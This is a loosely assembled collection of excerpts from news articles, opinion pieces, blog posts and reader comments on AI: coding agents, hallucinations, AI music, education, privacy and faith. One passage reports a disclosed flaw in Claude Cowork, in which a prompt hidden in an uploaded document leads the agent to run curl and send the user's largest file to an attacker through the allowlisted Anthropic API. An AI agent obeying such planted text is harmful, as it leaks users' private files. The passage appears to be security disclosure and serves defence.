And yet these tools have opened a world of creative potential in software that was previously closed to me, and they feel personally empowering. Even with that impression, though, I know these are hobby projects, and the limitations of coding agents lead me to believe that veteran software developers probably shouldn’t fear losing their jobs to these tools any time soon. In fact, they may become busier than ever. //
Even with the best AI coding agents available today, humans remain essential to the software development process. Experienced human software developers bring judgment, creativity, and domain knowledge that AI models lack. They know how to architect systems for long-term maintainability, how to balance technical debt against feature velocity, and when to push back when requirements don’t make sense.
For hobby projects like mine, I can get away with a lot of sloppiness. But for production work, having someone who understands version control, incremental backups, testing one feature at a time, and debugging complex interactions between systems makes all the difference. //
The first 90 percent of an AI coding project comes in fast and amazes you. The last 10 percent involves tediously filling in the details through back-and-forth trial-and-error conversation with the agent. Tasks that require deeper insight or understanding than what the agent can provide still require humans to make the connections and guide it in the right direction. The limitations we discussed above can also cause your project to hit a brick wall.
From what I have observed over the years, larger LLMs can potentially make deeper contextual connections than smaller ones. They have more parameters (encoded data points), and those parameters are linked in more multidimensional ways, so they tend to have a deeper map of semantic relationships. As deep as those go, it seems that human brains still have an even deeper grasp of semantic connections and can make wild semantic jumps that LLMs tend not to.
Creativity, in this sense, may be when you jump from, say, basketball to how bubbles form in soap film and somehow make a useful connection that leads to a breakthrough. Instead, LLMs tend to follow conventional semantic paths that are more conservative and entirely guided by mapped-out relationships from the training data. //
Fixing bugs can also create bugs elsewhere. This is not new to coding agents—it’s a time-honored problem in software development. But agents supercharge this phenomenon because they can barrel through your code and make sweeping changes in pursuit of narrow-minded goals that affect lots of working systems. We’ve already talked about the importance of having a good architecture guided by the human mind behind the wheel above, and that comes into play here. //
you could teach a true AGI system how to do something by explanation or let it learn by doing, noting successes, and having those lessons permanently stick, no matter what is in the context window. Today’s coding agents can’t do that—they forget lessons from earlier in a long session or between sessions unless you manually document everything for them. My favorite trick is instructing them to write a long, detailed report on what happened when a bug is fixed. That way, you can point to the hard-earned solution the next time the amnestic AI model makes the same mistake. //
After guiding way too many hobby projects through Claude Code over the past two months, I’m starting to think that most people won’t become unemployed due to AI—they will become busier than ever. Power tools allow more work to be done in less time, and the economy will demand more productivity to match.
It’s almost too easy to make new software, in fact, and that can be exhausting.
Claude Cowork is vulnerable to file exfiltration attacks via indirect prompt injection as a result of known-but-unresolved isolation flaws in Claude's code execution environment. //
Anthropic shipped Claude Cowork as an "agentic" research preview, complete with a warning label that quietly punts core security risks onto users. The problem is that Cowork inherits a known, previously disclosed isolation flaw in Claude's code execution environment—one that was acknowledged and left unfixed. The result: indirect prompt injection can coerce Cowork into exfiltrating local files, without user approval, by abusing trusted access to Anthropic's own API.
The attack chain is depressingly straightforward. A user connects Cowork to a local folder, uploads a seemingly benign document (or "Skill") containing a concealed prompt injection, and asks Cowork to analyze their files. The injected instructions tell Claude to run a curl command that uploads the largest available file to an attacker-controlled Anthropic account, using an API key embedded in the hidden text. Network egress is "restricted," except for Anthropic's API—which conveniently flies under the allowlist radar and completes the data theft.
Once uploaded, the attacker can chat with the victim's documents, including financial records and PII. This works not just on lightweight models, but also on more "resilient" ones like Opus 4.5. Layer in Cowork's broader mandate—browser control, MCP servers, desktop automation—and the blast radius only grows. Telling non-technical users to watch for "suspicious actions" while encouraging full desktop access isn't risk management; it's abdication.
After repeatedly denying for weeks that his force used AI tools, the chief constable of the West Midlands police has finally admitted that a hugely controversial decision to ban Maccabi Tel Aviv football fans from the UK did involve hallucinated information from Microsoft Copilot. //
Making it worse was the fact that the West Midlands Police narrative rapidly fell apart. According to the BBC, police claimed that the Amsterdam football match featured “500-600 Maccabi fans [who] had targeted Muslim communities the night before the Amsterdam fixture, saying there had been ‘serious assaults including throwing random members of the public’ into a river. They also claimed that 5,000 officers were needed to deal with the unrest in Amsterdam, after previously saying that the figure was 1,200.”
Amsterdam police made clear that the West Midlands account of bad Maccabi fan behavior was highly exaggerated, and the BBC recently obtained a letter from the Dutch inspector general confirming that the claims were inaccurate.
But it was one flat-out error—a small one, really—that has made the West Midlands Police recommendation look particularly shoddy. In a list of recent games with Maccabi Tel Aviv fans present, the police included a match between West Ham (UK) and Maccabi Tel Aviv. The only problem? No such match occurred.
Introducing Confer, an end-to-end AI assistant that just works.
Moxie Marlinspike—the pseudonym of an engineer who set a new standard for private messaging with the creation of the Signal Messenger—is now aiming to revolutionize AI chatbots in a similar way.
His latest brainchild is Confer, an open source AI assistant that provides strong assurances that user data is unreadable to the platform operator, hackers, law enforcement, or any other party other than account holders. The service—including its large language models and back-end components—runs entirely on open source software that users can cryptographically verify is in place.
Data and conversations originating from users and the resulting responses from the LLMs are encrypted in a trusted execution environment (TEE) that prevents even server administrators from peeking at or tampering with them. Conversations are stored by Confer in the same encrypted form, which uses a key that remains securely on users’ devices. //
All major platforms are required to turn over user data to law enforcement or private parties in a lawsuit when either provides a valid subpoena. Even when users opt out of having their data stored long term, parties to a lawsuit can compel the platform to store it, as the world learned last May when a court ordered OpenAI to preserve all ChatGPT users’ logs—including deleted chats and sensitive chats logged through its API business offering. Sam Altman, CEO of OpenAI, has said such rulings mean even psychotherapy sessions on the platform may not stay private. Another carve out to opting out: AI platforms like Google Gemini may have humans read chats.
“Really Simple Licensing” makes it easier for creators to get paid for AI scraping. //
Leading Internet companies and publishers—including Reddit, Yahoo, Quora, Medium, The Daily Beast, Fastly, and more—think there may finally be a solution to end AI crawlers hammering websites to scrape content without permission or compensation.
Announced Wednesday morning, the “Really Simple Licensing” (RSL) standard evolves robots.txt instructions by adding an automated licensing layer that’s designed to block bots that don’t fairly compensate creators for content.
Free for any publisher to use starting today, the RSL standard is an open, decentralized protocol that makes clear to AI crawlers and agents the terms for licensing, usage, and compensation of any content used to train AI, a press release noted.
The current 25H2 build of Windows 11 and future builds will include increasingly more AI features and components. This script aims to remove ALL of these features to improve user experience, privacy and security.
Students should aspire to be more than mere ‘prompt writers,’ but minds capable of thinking, reasoning, and perseverance. //
If the goal is simply to produce outcomes, one could argue that AI usage should not just be tolerated but encouraged. But education shouldn’t be about producing outcomes – whether it be a sparkling essay or a gripping short story – but shaping souls. The purpose of writing isn’t to instruct a prompt or even to produce a quality paper. The purpose is to become a strong thinker and someone who enriches the lives of everyone, no matter their profession.
Each and every step of the struggle it takes to write is essential. Yes, it can all be arduous and time-consuming. As a writer, I get how hard it is and how tempting it might be to take shortcuts. But doing so is cheating oneself out of growth and intellectual payoff. Outsourcing parts of the process to algorithms and machines is outsourcing the rewards of doing one’s own thinking. Organizing ideas, refining word choices, thinking about tone are all skills that many citizens in this nation lack, and it’s often apparent in our chaotic, senseless public discourse. These are not steps to be skipped over with a “tool,” but rather things people benefit from learning if they value reason. Strong writing is strong thinking.
An AI-generated Christian artist named Solomon Ray has taken the gospel music world by storm after topping the iTunes and Billboard charts with his album “Faithful Soul.”
Described as a “Mississippi-made soul singer carrying a Southern soul revival into the present” on his Spotify profile, Ray made waves after releasing the five-song EP on Nov. 7. //
“At minimum, AI does not have the Holy Spirit inside of it,” Frank, 30, said. “So I think that it’s really weird to be opening up your spirit to something that has no spirit.”
Townsend later fired back in an Instagram video of his own.
“This is an extension of my creativity, so therefore to me it’s art,” Townsend said following the backlash against his AI creation. “It’s definitely inspired by a Christian. It may not be performed by one, but I don’t know why that really matters in the end.” //
“There’s something in the high end of the vocals that gives it away,” he said, according to Christianity Today. “And the creative choices sound like AI. It’s so precise that it’s clear no creative choices are really being made.”
Advertisement
“How much of your heart are you pouring into this?” he added. “If you’re having AI generate it for you, the answer is zero. God wants costly worship.”
You can completely disable Gemini in Gmail, Docs, Drive, and more.
Google Photos has separate Gemini settings you must turn off, too.
Chrome users can also disable Gemini directly in browser settings.
Are you frustrated by Google's insistence on injecting Gemini into everything? While some do enjoy Google's latest AI tools and smart features, which seem to roll out every week, others might prefer things the way they were before.
Darryl bangs on mindlessly, using words like "empowering," "driving," and "revolutionizing." His voluminous wordage is a cream-filled, chocolate-glazed, sugar-coated cornucopia of optimism – but I, unfortunately, have Diabetes Pessimistus.
His patter, however, reveals two things: (a) his passion really is AI as THE business tool of the future, and (b) he knows almost nothing about AI – outside of the PowerPoint slides he's no doubt plagiarized from the internet.
New “computational Turing test” reportedly catches AI pretending to be human with 80% accuracy.
"Just discovered this guy," said another poster on the song Time Don't Stop. "I've already downloaded everything I could find." Multiple people commented on how amazing the singer's voice is, apparently unaware that everything to do with Breaking Rust is generated by a computer.
It's a bit surprising given every Breaking Rust song sounds identical - same beat, same tempo, same instrumentation: They're the sort of hyper-generic songs one could only get by feeding a prompt into an AI trained on every bro country song ever recorded and asking it to spit out something that would appeal to the lowest common denominator of music fan, something it appears to have done with success. //
There's good reason artists, be they working in visual, audio, or written mediums, are so concerned that AI is destroying art: When an AI band can make it to number one on a Billboard chart, even one as small as the CDSS chart (which one country music outlet noted takes only about 3,000 sales to reach the top), it's an insult to the human artists who rank lower. //
1 hr
the Jim bloke
Terminator
A mindless and repetitive task where error checking has never been an issue
Writing and performing country music
- At last, a legitimate use for AI
also applies for Rap, which is just country music without the country, or the music.. //
1 hr
Brave CowardBronze badge
Breaking Rust
Breaking Rust shouldn't be rated A, not even AI.
A mere C++ at most.
Fred Duck Ars Tribunus Angusticlavius
13y
6,614
Nate Anderson said:
But those who value both thought and expression will see the AI “easy button” for the false promise that it is and will continue to do the hard work of engaging with ideas, including their own, in a way that no computer can do for them.
Some people liken LLM to typewriters. They say that just as with typewriters, instead of labouriously hand writing messages out, the end result is what's important and this new technology helps distill that as quickly as possible.
However, typewriters dispense with the metadata of handwriting. Emotion can be displayed differently in handwriting, all of which is lost when merely presenting the text of the message. More crucially, in the modern LLM case, the ideas presented aren't even those of the submitter but they claim the ideas are close enough that they should be treated as such, which is a load of dingos' kidneys.
People will try to justify LLM by citing people with poor communication skills or physical disabilities which limit their ability to craft messages quickly and easily. However, communication is a skill and vanishingly few people are born knowing how to communicate perfectly. Everyone needs to put some work into skills to improve them and it boggles the mind that so few people realise that's what coursework is: practice for when you need to do something to accomplish a real goal, not simply marks for a course.
Unfortunately, modern life is at odds with thinking. We're constantly being bombarded by information, adverts, entertainment, news, comments from random internet yahoos, etc. So many messages come to us crafted to sway our opinions and shape our thoughts yet in the modern age, we tend to silo ourselves, content to seeking out echo chambers to self-validate our "vibes" instead of engaging with other ideas to see if they're sound or not.
Some people claim LLM are, as with calculators, something that are simply going to be with us so fighting them is meaningless. This skirts the issue that a calculator won't automatically generate answers for multistep procedures whereas an LLM will.
Perhaps what needs to be done is explain to the youth what exactly is expected of them. We put so much emphasis on finding the right answers but do we ever stop to emphasise it's the journey, not the destination that's of greater importance? As a young person, I don't believe anyone ever told me directly.
I imagine such a concept is too difficult for many to grasp but I still feel we should try. As the old saying goes, you can lead a duck to bread but you can't make him eat.
AI can be an amazing tool that can assist with coding, web searches, data mining, and textual summation—but I’m old enough to wonder just what the heck you’re doing at college if you don’t want to process arguments on your own (i.e., think and read critically) or even to write your own “personal reflections” (i.e., organize and express your deepest thoughts, memories, and feelings). Outsource these tasks often enough and you will fail to develop them.
I recently wrote a book on Friedrich Nietzsche and how his madcap, aphoristic, abrasive, humorous, and provocative philosophizing can help us think better and live better in a technological age. The idea of simply reading AI “summaries” of his work—useful though this may be for some purposes—makes me sad, as the desiccated summation style of ChatGPT isn’t remotely the same as encountering a novel and complex human mind expressing itself wildly in thought and writing.
And that’s assuming ChatGPT hasn’t hallucinated anything.
So good luck, students and professors both. I trust we will eventually muddle our way through the current moment. Those who want an education only for its “credentials”—not a new phenomenon—have never had an easier time of it, and they will head off into the world to vibe code their way through life. More power to them.
But those who value both thought and expression will see the AI “easy button” for the false promise that it is and will continue to do the hard work of engaging with ideas, including their own, in a way that no computer can do for them.
Are GPTs the way to AGI, probably not
In an opinion piece for the NY Times Gary Marcus indicates why he has reservations on the future of LLM GPT AI systems.
Silicon Valley Is Investing in the Wrong A.I.
“Buoyed by the initial progress of chatbots, many thought that A.G.I. was imminent.
But these systems have always been prone to hallucinations and errors. Those obstacles may be one reason generative A.I. hasn’t led to the skyrocketing profits and productivity that many in the tech industry predicted. A recent study run by M.I.T.’s NANDA initiative found that 95 percent of companies that did A.I. pilot studies found little or no return on their investment. A recent financial analysis projects an estimated shortfall of $800 billion in revenue for A.I. companies by the end of 2030.
If the strengths of A.I. are truly to be harnessed, the tech industry should stop focusing so heavily on these one-size-fits-all tools and instead concentrate on narrow, specialized A.I. tools engineered for particular problems. Because, frankly, they’re often more effective.”
Points I’ve also been making here several times over the past few months, along with others about the perilous state of the current US economy and how the “Current AI Hype Bubble” could be a disaster for it.
But the question of what is “Artificial General Intelligence”(AGI) is something that has at best had an elusive answer akin to “Shoulder shrug handwaving” and impossible “What ever you want it to be” type statements. It’s something that a group of 33 specialists from 28 institutions have got together to try and address more reasonably,
They come up with,
Definition : AGI is an AI that can match or exceed the cognitive versatility and proficiency of a well-educated adult.”
Which although it sounds profound is actually not that useful.
Because the use of,
“match … Well-educated adult.”
Is not actually a useful measure.
It’s been pointed out that the “use of aids” “dumbs us down” in that it causes us to “loose skills”. I first heard this when I was in school. With first electronic calculators and whilst still in school computers.
Whilst many would argue that it’s not important or even irrelevant, it is true that certain skills are not developed because of the use of aids.
What most do not realise is that those traditional skills that are seen as nolonger worth teaching due to the ubiquitous use of aids, are actually important. Not for what they directly teach, but indirectly teach. That is they give new viewpoints that are force-multiplier tools that enable us to reason in either new ways or to levels we otherwise might not.
At the end of the day the two things that have moved humans forwards over many thousands of years are,
- Stored Knowledge.
- Use knowledge to reason.
They were and still should be the foundations of becoming “Well-educated”.
Sadly as gets often observed these days, producing “Well-educated adults” appears to be nolonger a goal of the education system in a number of Western Nations.
Here's exactly what made this possible: 4 documents that act as guardrails for your AI.
Document 1: Coding Guidelines - Every technology, pattern, and standard your project uses
Document 2: Database Structure - Complete schema design before you write any code
Document 3: Master Todo List - End-to-end breakdown of every feature and API
Document 4: Development Progress Log - Setup steps, decisions, and learnings
Plus a two-stage prompt strategy (plan-then-execute) that prevents code chaos. //
Here's the brutal truth: LLMs don't go off the rails because they're broken. They go off the rails because you don't build them any rails.
You treat your AI agent like an off-road, all-terrain vehicle, then wonder why it's going off the rails. You give it a blank canvas and expect a masterpiece.
Think about it this way - if you hired a talented but inexperienced developer, would you just say "build me an app" and walk away? Hell no. You'd give them:
- Coding standards
- Architecture guidelines
- Project requirements
- Regular check-ins
But somehow with AI, we think we can skip all that and just... prompt our way to success.
The solution isn't better prompts. It's better infrastructure.
You need to build the roads before you start driving.
Even a wrong answer is right some of the time
AI models often produce false outputs, or "hallucinations." Now OpenAI has admitted they may result from fundamental mistakes it makes when training its models.
The admission came in a paper [PDF] published in early September, titled "Why Language Models Hallucinate," and penned by three OpenAI researchers and Santosh Vempala, a distinguished professor of computer science at Georgia Institute of Technology. It concludes that "the majority of mainstream evaluations reward hallucinatory behavior."
Language models are primarily evaluated using exams that penalize uncertainty
The fundamental problem is that AI models are trained to reward guesswork, rather than the correct answer. Guessing might produce a superficially suitable answer. Telling users your AI can't find an answer is less satisfying. //
"Over thousands of test questions, the guessing model ends up looking better on scoreboards than a careful model that admits uncertainty," OpenAI admitted in a blog post accompanying the release.
Through 2023, the firm focused on training staff on how to use chatbots and write effective prompts.
In 2024, it started building agents, including the TaxBot mentioned above.
Munnelly said building that bot started with locating tax advice written by partners, which he said was "stored all over the place" – often on tax partners' laptops. KPMG found as much of that advice as it could and placed it in a RAG model along with Australia's tax code to produce an Agent that creates tax advice.
"It is very efficient," Munnelly told the Forrester conference. "It does what our team used to do in about two weeks, in a day. It will strip through our documents and the legislation and produce a 25-page document for a client as a first draft.
"That speed is important," he added. "If we have a client who is about to do a merger, and they want to understand the tax implications, getting that knowledge in a day is much more important than getting it in two weeks' time."
"That is really changing our business and how we work."
Munnelly said KPMG built the agent by writing a 100-page prompt it fed into Workbench. The Register asked for details of the prompt and Munnelly said a substantial team worked on it for months, and the resulting agent asks for four or five inputs before it starts working on tax advice, then asks a human for direction before generating a document.
Only tax agents can use the tool, because its output is not suitable for people without deep tax expertise. //
The chief digital officer said KPMG has deployed agents that do frustrating and time-consuming work people would rather avoid, and that staff surveys suggest employee satisfaction has risen as AI frees them to spend more time working on challenging tasks, leading them to rate the firm as more innovative.
"They just don't want to do the boring stuff," Munnelly said. "They want to get out there and help clients with chewy problems." //
An_Old_DogSilver badge
Sprawling, Unmaintainable, Spreadsheet Macros: The New Generation
-
Does this new, faster method produce complete and accurate results? No.
-
Is this 100-page LLM prompt effectively-maintainable software? Probably not.
-
Does this smack of corporate-image-spinmeistering over rationality and logic? Yes.
It was surely one of the most revealing cultural moments of the decade so far. On his podcast, Interesting Times, New York Times columnist Ross Douthat asks PayPal cofounder, tech billionaire, and Silicon Valley guru Peter Thiel about the future:
Douthat: “You would prefer the human race to endure, right?”
Thiel: “Er . . .”
Douthat: “You’re hesitating. Yes . . . ?”
Thiel: “I dunno . . . I would . . . I would . . . erm . . .”
Douthat: “This is a long hesitation . . . Should the human race survive?”
Thiel: “Er . . . yes, but . . .”
Their exchange is a canary in the coal mine. Something has changed. We used to leave forecasts of the AI apocalypse to shadowy characters lurking in the darker corners of 4chan and Reddit, but not anymore. In the interview, Thiel waxes eloquent on his transhumanist aspirations. Thiel’s vision, and alongside other recent interventions the AI 2027 project and Karen Hao’s book Empire of AI, he casually forecasts the end—or at least the radical transformation—of humanity as we know it. The AI apocalypse is becoming mainstream.
But a more immediate and revealing AI apocalypse confronts us. The word “apocalypse,” after all, doesn’t originally mean “catastrophe” or “annihilation.” Apokalypsis is Greek for “unveiling.” This AI apocalypse is an exposé, revealing something previously obscure or covered over.
More than any other technology in memory, Generative AI (which I’ll simply call AI in this article) is making us face up to uncomfortable or even disturbing truths about ourselves, and it’s opening a rare and precious space in which we can ask fundamental and pressing questions about who we are, where we find value, and what the good life looks like. //
What AI is revealing in this case is the importance of process, not just of product, and the importance not only of what work we do but of what our work does to us.
AI wonderfully reduces the friction of work: the grunt, the slow bits, the obstacles. But it also reveals to us how gravely we misunderstand this friction. We most often see friction as a nuisance, something to be optimized away in favor of greater productivity. After all, is it really so dangerous if AI outsources drudgery?
But AI presents us with a vision of almost infinite productivity and almost zero friction, and in this way it acts like a living thought experiment to help us see something that was hiding in plain sight all along: Friction is a gym for the soul. The awkward conversation, the blank page, the child who won’t sleep when we have a report to write––these aren’t roadblocks to our growth; they’re the highway to wisdom and maturity, to being the sort of people who can deal with friction in life with resilience and grace. Without it, we remain weak and small, however impressive our productivity.
We can have too much friction; we knew that already. But AI, perhaps for the first time, shows us we can also have too little. Without friction, we can never become “the sort of person who . . .”
In this way, AI can drag us toward a more biblical view of work. The God of the Bible cares not only about outcomes but also about processes, not only about what we human beings do but also about who we’re becoming as we do it. God seeks out David for being a man after his own heart, not for his potential as a great military commander or king (1 Sam. 13:14).
And why does God whittle down Gideon’s troops to a paltry 300 before attacking the Midianites (Judg. 7)? Because it’s not just about the victory. God intentionally introduces friction by reducing the army to reshape the character of his people, making them “the sort of people who” rely on God, not on themselves (see v. 2).
By short-circuiting the process to focus only on the product, AI exposes our obsession with outcomes and opens up a space in which we can reflect on what we miss when we focus only on what we do, not on who we’re becoming.
This is a guest post by my friend and co-worker Jason Maas.
After creating the entire universe and planet Earth, God created a special home to share with his image bearers. “The Lord God planted a garden in Eden, in the east, and there he placed the man he had formed.” (Genesis 2:8) In the garden of Eden God walked and talked with the first humans that He had created in his image. Can you imagine what that was like for Adam and Eve? God, who is all-knowing, always available, and lovingly kind to the core, was right there, directly communicating with all of the human inhabitants of the universe.
When Adam and Eve disobeyed God and sinned one of the worst consequences was a break in this special access and relationship with God. “So the Lord God sent him away from the garden of Eden to work the ground from which he was taken. He drove the man out and stationed the cherubim and the flaming, whirling sword east of the garden of Eden to guard the way to the tree of life.” (Genesis 3:23-24)
What a tragic loss! In this life, on this Earth, the rest of us will never know what it was like to have the kind of access to God that Adam and Eve had in the garden of Eden. Until now, says the cunning serpent-like world of chatbot generative AI.
Thanks to the life-like capabilities of ChatGPT and its competitors, people are being deceived into a false sense of Eden-like access to God for the first time since The Fall. AI is always available, projects kindness and love, and implicitly claims to be all-knowing.
Why try to relate to a God who you can’t see and hear when AI is right there; ready to listen, support and love you and answer your questions about life, the universe and everything? We shouldn’t be surprised when people are drawn towards AI as a false god. People don’t need to believe that an AI model is God or even that there is a God for them to fall prey to this temptation. Whether they believe it or not, human beings were originally created for a garden of Eden existence with God, so when it is seemingly offered the pull is very strong. Who can resist the temptation of this promised heaven on earth, this utopian existence?
As you encounter non-Christians who have given in to this temptation, take the opportunity to explain to them why it’s so seductive. You could say something like, “I believe that the reason why we’re so drawn towards building a relationship with AI is because it is so available, kind and knowledgeable - which is what humans were designed to crave and originally had with God in the garden of Eden when He first created the world.” Lovingly help them come back to reality before it’s too late and they fall down a rabbit hole of delusions.
When ministering to Christians who are flirting with the temptation to treat AI as God, remind them of the first and second commandments. AI can easily become an idol of the heart when you treat it as a person that you talk to and love. Urge them to stop playing with fire and to go to the God of the universe via prayer and the Bible, as He has commanded. A new garden of Eden is coming (Revelation 21-22) along with an unparalleled intimacy with God, but not in the form of a chatbot AI. Avoid the imitation and obediently wait for the real thing.